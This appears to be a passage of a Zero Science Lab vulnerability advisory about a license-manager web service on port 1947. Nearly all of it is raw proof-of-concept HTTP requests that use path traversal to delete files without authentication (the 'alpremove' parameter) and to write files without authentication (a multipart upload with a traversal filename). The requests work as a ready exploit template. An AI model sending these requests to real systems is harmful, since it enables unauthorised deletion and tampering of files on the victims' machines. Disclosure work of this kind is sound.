Advisory ID: ZSL-2016-5330
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5330.php
26.04.2016
--
1. Unauthenticated file removal using POST or GET:
--------------------------------------------------
1st request renames the file to meaning_of_life.txt.bak
2nd request removes the file entirely from C:\
--------------------------------------------------------
POST /_int_/action.html HTTP/1.1
Host: localhost:1947
alpremove=/../../../../../../../meaning_of_life.txt
OR
1st req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1
2nd req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1
2. Unauthenticated file write:
------------------------------
PoC that creates license file in C:\
-------------------------------------
POST /_int_/checkin_file.html HTTP/1.1
Host: localhost:1947
Content-Length: 770
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:1947
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVlbofFpDmUw9CugB
Referer: http://localhost:1947/_int_/checkin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: hasplmlang=_int_
Connection: close
------WebKitFormBoundaryVlbofFpDmUw9CugB
Content-Disposition: form-data; name="check_in_file"; filename="\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\jxzp"
Content-Type: application/octet-stream
<?xml version="1.0" encoding="UTF-8" ?>
<location>
<license_manager id="\..\..\..\..\..\..\..\..\..\..\..\juuzzta" time="0">
<version>18.0.1.55505</version>
<hostname>LAB-ZSL</hostname>
<name>LAB-ZSL</name>
<host_fingerprint type="SL-AdminMode" crc="1439826437">
MXhJSWPdmwJr2iAIUgAGKBk/7N4U2GbJjLA6hGC1VHDvrsA2W+8e2ChuAFYgF6ZG
ttm6N6iupYkEEHzcQQrG1r0pIGBarRkAy0GR46nuTYFtm8iAMA5IBQoP82wKbLMl
gUKpUABvAmhFimCbrXumJpsOA8ApTjaU12zdm0LkvsgTAPECCFTau
</host_fingerprint>
</license_manager>
</location>
------WebKitFormBoundaryVlbofFpDmUw9CugB--